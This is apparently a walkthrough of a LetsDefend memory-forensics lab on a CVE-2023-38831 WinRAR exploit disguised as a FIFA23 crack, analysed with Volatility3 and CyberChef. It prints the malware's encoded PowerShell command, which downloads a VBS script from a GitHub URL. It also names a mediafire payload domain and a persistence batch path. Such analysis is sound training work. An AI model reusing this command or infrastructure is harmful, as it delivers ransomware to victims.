← Back to Index

LetsDefend - WinRAR 0-Day

Created: 03/04/2024 9:09 Last Updated: 03/04/2024 10:48


**WinRAR 0-Day** ![0daa668d9de0fe509e74ee432dcb56d4.png](/resources/0daa668d9de0fe509e74ee432dcb56d4.png)

It appears that there are numerous cracked versions of popular games available. However, it seems we may have downloaded the wrong one, as it exhibits suspicious behavior. We require your assistance in investigating this matter.

Tools Required: 1- Volatility3 2- Cyberchef

Memory dump: /root/Desktop/Winny.vmem

This challenge prepared by @MMOX


Read about this vulnerability first to gain an insight about this 0-day and here is POC of this vulnerability

Start Investigation

What is the suspected process?

d82ab32c2f8d6d2ee3907347b83e3252.png We got vmem file as an evidence file and volatility 3 to analyze this memory file 09ef290ea8c7c033669c8ca073e0f9c4.png used plugin windows.pstree to show process tree, there are 2 WinRAR.exe under explorer.exe which matchs name and scenario of this challenge.

WinRAR.exe

We suspect that the crack had another name. Can you find the old name of that crack?

0d0ddecbe55f92369ebc6500246934c6.png used windows.cmdline plugin, you can see that winrar was used to open suspicious rar file.

b6wzzawS.rar

What is the new crack filename?

aabee5c11b91d7945920d18a714b2528.png I used filescan plugin piped into text file then filter with Downloads folder, you can see that there is 1 suspicious rar file there and its FIFA23CRACK which make sense since Fifa23 is a football game.

FIFA23CRACK.rar

What is the command that executed the remote request?

We got an offset/virtual address of the suspicious cracked game archive so we can use dumpfile plugin to dump this file out a156d2f8cebefb5da4d43a72e6842c9f.png 92d7c0d371685f101649db9fe379c624.png I used strings to see how many files had been compressed into this file and there are 2 files a7dceaad688df5cd2903c3f5e183ccdb.png Then I used 7z to extract those file out 4294fd48bd4c6bdc54097dd1b2aa08f4.png First file is PNG file in disguise which also make sense because in this CVE, user needed to click ReadMe.txt first then malicious command inside cmd file will be executed 90d42cb211ae8617e58f3754ad5bbcbe.png Here is the malicious powershell command

powershell.exe -EncodedCommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0Vsc2ZhN0VsNGEyeS9TZWNyZXRXZWFwL21haW4vU2Q0cUF4MjEudmJzJyAtT3V0RmlsZSAiJGVudjpURU1QXFNkNHFBeDIxLnZicyI=

The external link has a username. What is it?

e4f5480e544a040200fa7072aff627c5.png Decode base64 strings, you can see that this is a command to download vbs script from github

Elsfa7El4a2y

It seems the creator of that ransomware uploaded a file to the cloud. Can you find which domain it was downloaded from?

Here is the link to sample, Download it and analyze it using any text editor. 7a8c1b4cceb5c9d94efc3a99b46451ce.png You can see that this script used HTTP request to somewhere, We need to decode that weird suspiciously long string and we also need to know what OwOwO function does 547367ba6a95b49c8a3a125acfe8ff66.png d54973dca73045a475b74e334af55285.png so its to make HEX to ASCII d7f53b9f2d7e5fae3c1af02ba3facead.png come back to replace, we need to know which strings to be replace and what is the new replacing string is 618d7df2f05b8788c8f857d5c42f206e.png Use Find / Replace recipe on Cyberchef, we got Hex 7c2f7ee1ac6012a86d52b1cf82956e29.png Then use From Hex, We finally got an url

download850.mediafire.com

The attacker left the file behind in someplace to come back later for the device. What is the full location of this file?

f2030d812337abbe6e28a583fdcaa19b.png You can see that there is .savetofile function here with Reverse string and replace string, that string also look like base64 too 15ebf5eb7a19e70eed02fe6098f1a885.png We can use Find / Replace with From Base64 to decode, the result is the file that was created to stay persistence.

c:\windows\temp\B4cKL4T3R.bat

Summary

Culprit of this incident is FIFA23CRACK.rar which was designed to exploit CVE-2023-38831 vulnerability by baiting user to click ReadMe.txt inside WinRAR program and then it will executed malicious powershell command from other file inside rar archive file which lead to download ransomware to a system.

![c37d5ed8681fdc882caf844554587ee3.png](/resources/c37d5ed8681fdc882caf844554587ee3.png)